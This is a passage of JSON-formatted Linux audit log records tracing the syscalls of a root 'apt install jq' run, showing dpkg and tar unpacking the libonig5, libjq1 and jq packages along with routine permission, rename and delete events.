"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
],
"launch_time": 1632470477.697,
"ppid": 7575
}
}
{
"ID": "1632470477.713:460",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7626,
"pid": 7629,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg-deb",
"exe": "/usr/bin/dpkg-deb",
"key": "rootcmd",
"ARGV": [
"0x7ffdee8dec40",
"0x55bc6d4df510",
"0x7ffdee8deff0",
"0x7f493ebfb740"
]
},
"CWD": {
"cwd": "/var/lib/dpkg/tmp.ci"
},
"PATH": [
{
"item": 0,
"name": "/usr/sbin/tar",
"nametype": "UNKNOWN",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"PARENT_INFO": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
],
"launch_time": 1632470477.709,
"ppid": 7624
}
}
{
"ID": "1632470477.713:461",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7626,
"pid": 7629,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "tar",
"exe": "/usr/bin/tar",
"key": "rootcmd",
"ARGV": [
"0x7ffdee8dec40",
"0x55bc6d4df510",
"0x7ffdee8deff0",
"0x7f493ebfb740"
]
},
"EXECVE": {
"argc": 5,
"ARGV": [
"tar",
"-x",
"-f",
"-",
"--warning=no-timestamp"
]
},
"CWD": {
"cwd": "/var/lib/dpkg/tmp.ci"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/tar",
"inode": 787546,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"PARENT_INFO": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
],
"launch_time": 1632470477.709,
"ppid": 7624
}
}
{
"ID": "1632470477.717:462",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 93,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7626,
"pid": 7629,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "tar",
"exe": "/usr/bin/tar",
"key": "perm_mod",
"ARGV": [
"0x3",
"0x0",
"0x0",
"0x1ff"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 276990,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"PARENT_INFO": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
],
"launch_time": 1632470477.709,
"ppid": 7624
}
}
{
"ID": "1632470477.717:463",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 91,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7626,
"pid": 7629,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "tar",
"exe": "/usr/bin/tar",
"key": "perm_mod",
"ARGV": [
"0x3",
"0x1a4",
"0x1a4",
"0x0"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 276990,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"PARENT_INFO": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
],
"launch_time": 1632470477.709,
"ppid": 7624
}
}
{
"ID": "1632470477.717:464",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 93,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7626,
"pid": 7629,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "tar",
"exe": "/usr/bin/tar",
"key": "perm_mod",
"ARGV": [
"0x3",
"0x0",
"0x0",
"0x1ff"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 276992,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"PARENT_INFO": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
],
"launch_time": 1632470477.709,
"ppid": 7624
}
}
{
"ID": "1632470477.717:465",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 91,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7626,
"pid": 7629,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "tar",
"exe": "/usr/bin/tar",
"key": "perm_mod",
"ARGV": [
"0x3",
"0x1a4",
"0x1a4",
"0x0"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 276992,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"PARENT_INFO": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
],
"launch_time": 1632470477.709,
"ppid": 7624
}
}
{
"ID": "1632470477.717:466",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 93,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7626,
"pid": 7629,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "tar",
"exe": "/usr/bin/tar",
"key": "perm_mod",
"ARGV": [
"0x3",
"0x0",
"0x0",
"0x1ff"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 276994,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"PARENT_INFO": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
],
"launch_time": 1632470477.709,
"ppid": 7624
}
}
{
"ID": "1632470477.717:467",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 91,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7626,
"pid": 7629,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "tar",
"exe": "/usr/bin/tar",
"key": "perm_mod",
"ARGV": [
"0x3",
"0x1a4",
"0x1a4",
"0x0"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 276994,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"PARENT_INFO": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
],
"launch_time": 1632470477.709,
"ppid": 7624
}
}
{
"ID": "1632470477.717:468",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 93,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7626,
"pid": 7629,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "tar",
"exe": "/usr/bin/tar",
"key": "perm_mod",
"ARGV": [
"0x3",
"0x0",
"0x0",
"0x1ff"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 277004,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"PARENT_INFO": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
],
"launch_time": 1632470477.709,
"ppid": 7624
}
}
{
"ID": "1632470477.721:469",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 91,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7626,
"pid": 7629,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "tar",
"exe": "/usr/bin/tar",
"key": "perm_mod",
"ARGV": [
"0x3",
"0x1a4",
"0x1a4",
"0x0"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 277004,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"PARENT_INFO": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
],
"launch_time": 1632470477.709,
"ppid": 7624
}
}
{
"ID": "1632470477.721:470",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 93,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7626,
"pid": 7629,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "tar",
"exe": "/usr/bin/tar",
"key": "perm_mod",
"ARGV": [
"0x3",
"0x0",
"0x0",
"0x1ff"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 277008,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"PARENT_INFO": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
],
"launch_time": 1632470477.709,
"ppid": 7624
}
}
{
"ID": "1632470477.721:471",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 91,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7626,
"pid": 7629,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "tar",
"exe": "/usr/bin/tar",
"key": "perm_mod",
"ARGV": [
"0x3",
"0x1a4",
"0x1a4",
"0x0"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 277008,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"PARENT_INFO": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
],
"launch_time": 1632470477.709,
"ppid": 7624
}
}
{
"ID": "1632470477.721:472",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 260,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7626,
"pid": 7629,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "tar",
"exe": "/usr/bin/tar",
"key": "perm_mod",
"ARGV": [
"0xffffff9c",
"0x559d6c0fd350",
"0x0",
"0x0"
]
},
"CWD": {
"cwd": "/var/lib/dpkg/tmp.ci"
},
"PATH": [
{
"item": 0,
"name": ".",
"inode": 276984,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"PARENT_INFO": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
],
"launch_time": 1632470477.709,
"ppid": 7624
}
}
{
"ID": "1632470477.777:473",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba29b7e0",
"0x556eba29b810",
"0x556eba29b82a",
"0x556eb8dc8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/updates/tmp.i",
"inode": 276936,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/updates/0000",
"inode": 276936,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.785:474",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba29b7e0",
"0x556eba29b810",
"0x556eba29b82a",
"0x556eb8dc8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/updates/tmp.i",
"inode": 277010,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/updates/0001",
"inode": 277010,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.785:475",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7624,
"pid": 7630,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "rootcmd",
"ARGV": [
"0x7ffef7ae40b0",
"0x7ffef7ae4170",
"0x556eba29b570",
"0x7ffef7ae41b0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/sbin/dpkg-deb",
"nametype": "UNKNOWN",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
],
"launch_time": 1632470477.697,
"ppid": 7575
}
}
{
"ID": "1632470477.785:476",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7624,
"pid": 7630,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg-deb",
"exe": "/usr/bin/dpkg-deb",
"key": "rootcmd",
"ARGV": [
"0x7ffef7ae40b0",
"0x7ffef7ae4170",
"0x556eba29b570",
"0x7ffef7ae41b0"
]
},
"EXECVE": {
"argc": 3,
"ARGV": [
"dpkg-deb",
"--fsys-tarfile",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/dpkg-deb",
"inode": 787052,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
],
"launch_time": 1632470477.697,
"ppid": 7575
}
}
{
"ID": "1632470477.789:477",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "no",
"exit": "-2",
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556ebaf26ed0",
"0xfffffffffffffe98",
"0x81a4"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/lib/x86_64-linux-gnu/",
"inode": 786675,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/lib/x86_64-linux-gnu/",
"inode": 786675,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.789:478",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x81a4"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/lib/x86_64-linux-gnu/",
"inode": 786675,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.789:479",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x81a4"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/lib/x86_64-linux-gnu/",
"inode": 786675,
"dev": "fd:00",
